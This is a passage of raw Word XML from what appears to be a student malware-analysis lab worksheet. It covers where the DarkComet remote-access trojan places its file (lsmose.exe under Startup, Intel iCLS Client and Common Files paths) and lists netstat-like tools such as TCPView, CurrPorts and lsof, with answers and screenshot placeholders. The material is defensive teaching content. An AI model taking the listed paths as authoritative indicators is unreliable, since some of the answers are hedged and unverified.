              <w:t>Which folder is created when the victim click on a dark comet?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2951B53D" w14:textId="77777777" w:rsidR="00160F8D" w:rsidRPr="00160F8D" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">The exact name and location of the folder created by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>DarkComet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> may vary depending on the specific version of the malware and the attacker's configuration. However, some common names and locations for the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>DarkComet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder include:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA2A9A5" w14:textId="77777777" w:rsidR="00160F8D" w:rsidRPr="00160F8D" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0152F989" w14:textId="77777777" w:rsidR="00160F8D" w:rsidRPr="00160F8D" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>AppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%\Roaming\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Microsot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>\Windows\Start Menu\Programs\Startup\lsmose.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673BA108" w14:textId="77777777" w:rsidR="00160F8D" w:rsidRPr="00160F8D" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ProgramFiles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%\Intel\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>iCLS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Client\lsmose.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118F9B73" w14:textId="397B003E" w:rsidR="00706961" w:rsidRPr="00706961" w:rsidRDefault="00160F8D" w:rsidP="00706961">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>SystemDrive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00160F8D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>%\Program Files\Common Files\System\lsmose.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460F358E" w14:textId="77777777" w:rsidR="00160F8D" w:rsidRPr="00160F8D" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="466F382F" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Find an application which can see the "Established" and "Listening" connection of a machine just like "netstat".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E19FBCF"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r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>There are several applications available that can display established and listening network connections on a machine, similar to the netstat command. Here are a few examples:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DE0D71"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
          <w:p w14:paraId="22B66857"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roofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>TCPView</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>TCPView</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a free Windows application that displays all current TCP and UDP connections, including those in the listening state. It provides a detailed view of each connection, including the local and remote IP addresses, port numbers, and process IDs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ACDA59A"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
          <w:p w14:paraId="4E56D02C"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r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Process Explorer: Process Explorer is another free Windows tool from Microsoft that provides a more advanced view of system processes and network connections than the built-in Task Manager. It can display established and listening connections, as well as provide detailed information about the processes that are using them.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737D0FE8"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
          <w:p w14:paraId="1FD83503"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roofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CurrPorts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>CurrPorts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a free Windows application that displays all open TCP/IP and UDP ports on a machine, including those in the listening state. It can also show the process that opened each port and the remote address of any established connections.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44768623" w14:textId="77777777"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
          <w:p w14:paraId="52A36F4A" w14:textId="1204C296" w:rsidR="00706961" w:rsidRPr="00706961" w:rsidRDefault="00706961" w:rsidP="00706961">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>lsof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>lsof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00706961">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a command-line utility available on Unix and Unix-like systems that can display open files, including network connections. It can show established and listening connections, as well as provide detailed information about the processes that are using them.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57734803" w14:textId="2E5322EA" w:rsidR="00160F8D" w:rsidRPr="004B6E6C" w:rsidRDefault="00160F8D" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="689F019C" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370DB017" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232923D8" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C50E5DD" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468F4BAB" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Student Work Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256A6AF" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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303BDB72" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1836010A" wp14:editId="6AD291FB">
            <wp:extent cx="6422835" cy="2456597"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1845559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9244" name="Picture 1"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27144" cy="2458245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED777B" w14:textId="0322E229" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B37309D" wp14:editId="7F50B632">
            <wp:extent cx="5943600" cy="6908165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="34567599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998" name="Picture 3" descr="Graphical user interface, text,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908165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2DF4D" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BAFDFD" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630DA2C4" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2A276D" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75373B7D" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F221C5" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="566AA116" wp14:editId="53B2ABD2">
            <wp:extent cx="5500048" cy="3939351"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="373545003" name="Picture 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5003" name="Picture 4" descr="A picture containing text, screenshot,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8110" cy="3952287"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E066A0A" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08768789" wp14:editId="463A49FE">
            <wp:extent cx="5527343" cy="3793553"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1795155848"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5848" name="Picture 5"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0090" cy="3795438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07586C9B" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
